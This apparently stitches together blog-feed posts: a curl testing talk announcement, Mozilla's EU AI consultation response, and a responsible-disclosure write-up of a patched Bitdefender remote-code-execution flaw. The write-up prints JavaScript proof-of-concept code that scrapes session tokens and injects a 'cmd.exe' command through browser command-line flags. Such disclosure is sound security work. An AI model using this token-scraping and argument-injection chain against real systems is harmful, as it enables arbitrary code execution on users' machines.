Abstract: curl runs in some ten billion installations in the world, in virtually every connected device on the planet, and has been ported to more operating systems than most. In this presentation, curl’s lead developer Daniel Stenberg talks about how the curl project takes on testing, QA, CI, fuzzing and more, to make sure curl remains a stable and secure component for everyone while still getting new features and being developed further. With a Q&A session at the end for your questions!

Register here to attend the live event. The video will be made available afterward.

<figcaption>Daniel presenting at cs3sthlm 2019</figcaption>

Mozilla Open Policy & Advocacy BlogMozilla’s response to EU Commission Public Consultation on AI

In Q4 2020 the EU will propose what’s likely to be the world’s first general AI regulation. While there is still much to be defined, the EU looks set to establish rules and obligations around what it’s proposing to define as ‘high-risk’ AI applications. In advance of that initiative, we’ve filed comments with the European Commission, providing guidance and recommendations on how it should develop the new law. Our filing brings together insights from our work in Open Innovation and Emerging Technologies, as well as the Mozilla Foundation’s work to advance trustworthy AI in Europe.

We are in alignment with the Commission’s objective outlined in its strategy to develop a human-centric approach to AI in the EU. There is promise and the potential for new and cutting edge technologies that we often collectively refer to as “AI” to provide immense benefits and advancements to our societies, for instance through medicine and food production. At the same time, we have seen some harmful uses of AI amplify discrimination and bias, undermine privacy, and violate trust online. Thus the challenge before the EU institutions is to create the space for AI innovation, while remaining cognisant of, and protecting against, the risks.

We have advised that the EC’s approach should be built around four key pillars:

  • Accountability: ensuring the regulatory framework will protect against the harms that may arise from certain applications of AI. That will likely involve developing new regulatory tools (such as the ‘risk-based approach’) as well as enhancing the enforcement of existing relevant rules (such as consumer protection laws).
  • Scrutiny: ensuring that individuals, researchers, and governments are empowered to understand and evaluate AI applications, and AI-enabled decisions – through for instance algorithmic inspection, auditing, and user-facing transparency.
  • Documentation: striving to ensure better awareness of AI deployment (especially in the public sector), and to ensure that applications allow for documentation where necessary – such as human rights impact assessments in the product design phase, or government registries that map public sector AI deployment.
  • Contestability: ensuring that individuals and groups who are negatively impacted by specific AI applications have the ability to contest those impacts and seek redress e.g. through collective action.

The Commission’s consultation focuses heavily on issues related to AI accountability. Our submission therefore provides specific recommendations on how the Commission could better realise the principle of accountability in its upcoming work. Building on the consultation questions, we provide further insight on:

  • Assessment of applicable legislation: In addition to ensuring the enforcement of the GDPR, we underline the need to take account of existing rights and protections afforded by EU law concerning discrimination, such as the Racial Equality directive and the Employment Equality directive.
  • Assessing and mitigating “high risk” applications: We encourage the Commission to further develop (and/or clarify) its risk mitigation strategy, in particular how, by whom, and when risk is being assessed. There are a range of points we have highlighted here, from the importance of context and use being critical components of risk assessment, to the need for comprehensive safeguards, the importance of diversity in the risk assessment process, and that “risk” should not be the only tool in the mitigation toolbox (e.g. consider moratoriums).
  • Use of biometric data: the collection and use of biometric data comes with significant privacy risks and should be carefully considered where possible in an open, consultative, and evidence-based process. Any AI applications harnessing biometric data should conform to existing legal standards governing the collection and processing of biometric data in the GDPR. Besides questions of enforcement and risk-mitigation, we also encourage the Commission to explore edge-cases around biometric data that are likely to come to prominence in the AI sphere, such as voice recognition.

A special thanks goes to the Mozilla Fellows 2020 cohort, who contributed to the development of our submission, in particular Frederike Kaltheuner, Fieke Jansen, Harriet Kingaby, Karolina Iwanska, Daniel Leufer, Richard Whitt, Petra Molnar, and Julia Reinhardt.

This public consultation is one of the first steps in the Commission’s lawmaking process. Consultations in various forms will continue through the end of the year when the draft legislation is planned to be proposed. We’ll continue to build out our thinking on these recommendations, and look forward to collaborating further with the EU institutions and key partners to develop a strong framework for the development of a trusted AI ecosystem. You can find our full submission here.

The post Mozilla’s response to EU Commission Public Consultation on AI appeared first on Open Policy & Advocacy.

Wladimir PalantExploiting Bitdefender Antivirus: RCE from any website

My tour through vulnerabilities in antivirus applications continues with Bitdefender. One thing shouldn’t go unmentioned: security-wise Bitdefender Antivirus is one of the best antivirus products I’ve seen so far, at least in the areas that I looked at. The browser extensions minimize attack surface, the crypto is sane and the Safepay web browser is only suggested for online banking where its use really makes sense. Also very unusual: despite jQuery being used occasionally, the developers are aware of Cross-Site Scripting vulnerabilities and I only found one non-exploitable issue. And did I mention that reporting a vulnerability to them was a straightforward process, with immediate feedback and without any terms to be signed up front? So clearly security isn’t an afterthought here, which is sadly different for way too many competing products.

Bitdefender's online protection and Safepay components exploding when brought together<figcaption> Image credits: Bitdefender, ImageFreak, matheod, Public Domain Vectors </figcaption>

But they aren’t perfect of course, or I wouldn’t be writing this post. I found a combination of seemingly small weaknesses, each of them already familiar from other antivirus products. When used together, the effect was devastating: any website could execute arbitrary code on the user’s system, with the privileges of the current user (CVE-2020-8102). Without any user interaction whatsoever. From any browser, regardless of what browser extensions were installed.

Summary of the findings

As part of its Online Protection functionality, Bitdefender Antivirus will inspect secure HTTPS connections. Rather than leaving error handling to the browser, Bitdefender for some reason prefers to display their own error pages. This is similar to how Kaspersky used to do it but without most of the adverse effects. The consequence is nevertheless that websites can read out some security tokens from these error pages.

These security tokens cannot be used to override errors on other websites, but they can be used to start a session with the Chromium-based Safepay browser. This API was never meant to accept untrusted data, so it is affected by the same vulnerability that we’ve seen in Avast Secure Browser before: command line flags can be injected, which in the worst case results in arbitrary applications starting up.

How Bitdefender deals with HTTPS connections

It seems that these days every antivirus product is expected to come with three features as part of their “online protection” component: Safe Browsing (blocking of malicious websites), Safe Search (flagging of malicious search results) and Safe Banking (delegating online banking websites to a separate browser). Ignoring the question of whether these features are actually helpful, they present antivirus vendors with a challenge: how does one get into encrypted HTTPS connections to implement these?

Some vendors went with the “ask nicely” approach: they ask users to install their browser extension which can then implement the necessary functionality. Think McAfee for example. Others took the “brutal” approach: they got between the browser and the web servers, decrypted the data on their end and re-encrypted it again for the browser using their own signing certificate. Think Kaspersky. And yet others took the “cooperative” approach: they work with the browsers, using an API that allows external applications to see the data without decrypting it themselves. Browsers introduced this API specifically because antivirus products would make such a mess otherwise.

Bitdefender is one of the vendors who chose “cooperative,” for the most part at least. Occasionally their product will have to modify the server response, for example on search pages where they inject the script implementing the Safe Search functionality. Here they unavoidably have to encrypt the modified server response with their own certificate.

Quite surprisingly however, Bitdefender will also handle certificate errors itself instead of leaving them to the browser, despite it being unnecessary with this setup.

Bitdefender error page displayed due to a mismatched security certificate

Compared to Kaspersky’s, this page does quite a few things right. For example, the highlighted action is “Take me back to safety.” Clicking “I understand the risks” will present an additional warning message which is both informative and largely mitigates clickjacking attacks. But there is also the issue with HSTS being ignored, same as it was with Kaspersky. So altogether this introduces unnecessary risks when the browser is more capable of dealing with errors like this one.

But right now the interesting aspect here is: the URL in the browser’s address bar doesn’t change. So as far as the browser is concerned, this error page originated at the web server and there is no reason why other web pages from the same server shouldn’t be able to access it. Whatever security tokens are contained within it, websites can read them out – an issue we’ve seen in Kaspersky products before.

What accessing an error page can be good for

My proof of concept used a web server that presented a valid certificate on the initial request but switched to an invalid certificate after that. This allowed loading a malicious page in the browser, then switching to an invalid certificate and using XMLHttpRequest to download the resulting error page. This being a same-origin request, the browser will not stop you. In that page you would have the code behind the “I understand the risks” link:

var params = encodeURIComponent(window.location);
sid = "" + Math.random();
obj_ajax.open("POST", sid, true);
obj_ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
obj_ajax.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", "NDSECK_c8f32fef47aca4f2586bd075f74d2aa4");
obj_ajax.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", "NDCA_c8f32fef47aca4f2586bd075f74d2aa4");
obj_ajax.setRequestHeader("BDNDTK_BTS86RE4PDHKKZYVUJE2UCM87SLSUGYF", "835f2e23ded6bda7b3476d0db093e2f590efc1e9333f7bb7ad48f0dba1f548d2");
obj_ajax.setRequestHeader("BDWL_D0D57627257747A3B2EE8E4C3B86CBA3", "a99d4961b70a8179664efc718b00c8a8");
obj_ajax.setRequestHeader("BDPID_A381AA0A15254C36A72B115329559BEB", "1234");
obj_ajax.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "cl.proceedanyway");
obj_ajax.send(params);

So in order to communicate with the Bitdefender application, a website sends a request to any address. The request will then be processed by Bitdefender locally if the correct HTTP headers are set. And despite the header names looking randomized, they are actually hardcoded and never change. So what we are interested in are the values.

The most interesting headers are BDNDSS_B67EA559F21B487F861FDA8A44F01C50 and BDNDCA_BBACF84D61A04F9AA66019A14B035478. These contain essentially the same value, an identifier of the current Bitdefender session. Would we be able to ignore errors on other websites using these? No, this doesn’t work because the correct BDNDTK_BTS86RE4PDHKKZYVUJE2UCM87SLSUGYF value is required as well. It’s an HMAC-SHA-256 signature of the page address, and the session-specific secret used to generate this signature isn’t exposed.

But remember, there are three online protection components, and the other ones also expose some functionality to the web. As it turns out, all functionality uses the same BDNDSS_B67EA559F21B487F861FDA8A44F01C50 and BDNDCA_BBACF84D61A04F9AA66019A14B035478 values, but Safe Search and Safe Banking don’t implement any additional protection beyond that. Want to have the antivirus check a bunch of search results for you? Probably not very exciting but any website could access that functionality.
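
To make the attack flow concrete, here is a minimal sketch of that token-extraction step as a malicious page might implement it (the random path and the startSafepay helper are hypothetical, the token format is simply taken from the error page excerpt above, and it assumes the attacker’s server has already switched to the invalid certificate):

var probe = new XMLHttpRequest();
// Same-origin request; with the certificate now invalid, Bitdefender answers it
// with its own error page instead of the real server response.
probe.open("GET", "/" + Math.random(), true);
probe.onload = function() {
  var page = probe.responseText;
  // The error page embeds the session tokens as plain header values
  // (no error handling here, for brevity).
  var param1 = /"(NDSECK_[0-9a-f]+)"/.exec(page)[1];
  var param2 = /"(NDCA_[0-9a-f]+)"/.exec(page)[1];
  startSafepay(param1, param2); // hypothetical helper wrapping the exploit code below
};
probe.send();

With param1 and param2 in hand, the banking mode request described in the next section is all that is left.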

Starting and exploiting banking mode

But starting banking mode is more interesting. The following code template from Bitdefender shows how. This template is meant to generate code injected into banking websites, but it doesn’t appear to be used any more (yes, unused code can still cause issues).

var params = encodeURIComponent(window.location);
sid = "" + Math.random();
obj_ajax.open("POST", sid, true);
obj_ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
obj_ajax.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", "{%NDSECK%}");
obj_ajax.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", "{%NDCA%}");
obj_ajax.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "{%OBKCMD%}");
obj_ajax.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", "{%OBKREFERRER%}");
obj_ajax.send(params);

We’ve seen the NDSECK and NDCA values before; these are the values that can be extracted from Bitdefender’s error page. OBKCMD can be obk.ask or obk.run, depending on whether we want to ask the user first or run the Safepay browser immediately (we want the latter of course). OBKREFERRER can be any address and doesn’t seem to matter. But the params value sent with the request is important: it will be the address opened in the Safepay browser.

So now we have a way to open a malicious website in the Safepay browser, and we can potentially compromise all the nicely isolated online banking websites running there. But that’s not the big coup of course. What if we try to open a javascript: address? Well, it crashes, could be exploitable… And what about whitespace in the address? Spaces will be URL-encoded in https: addresses but not in data: addresses. And then we see the same issue as with Avast’s banking mode, whitespace allows injecting command line flags.

That’s it, time for the actual exploit. Here, param1 and param2 are the values extracted from the error page:

var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);
request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);
request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");
request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");

And this is what you get then:

Command line prompt displayed on top of the Safepay browser window

The first line is the output of the whoami command while the remaining output is produced by the echo command – it displays all the additional command line parameters received by the application.

Conclusions

It’s generally preferable that antivirus vendors stay away from encrypted connections as much as possible. Messing with server responses tends to cause issues even when executed carefully, which is why I consider browser extensions the preferable way of implementing online protection. But even with their current approach, Bitdefender should really leave error handling to the browser.

There is also the casual reminder here that even data considered safe should not be trusted unconditionally. That’s particularly the case when constructing command lines: properly escaping parameter values should be the default, so that unintentionally injecting command line flags, for example, is impossible. And of course: if you don’t use some code, remove it! Less code automatically means fewer potential vulnerabilities.

Timeline

  • 2020-04-15: Reported the vulnerability via the Bitdefender Bug Bounty Program.
  • 2020-04-15: Confirmation from Bitdefender that the report was received.
  • 2020-04-16: Confirmation that the issue could be reproduced, CVE number assigned.
  • 2020-04-23: Notification that the vulnerability is resolved and updates are underway.
  • 2020-05-04: Communication about bug bounty payout (declined by me) and coordinated disclosure.
  • 2020-05-12: Confirmation that fixes have been pushed out. Disclosure delayed due to waiting for technology partners.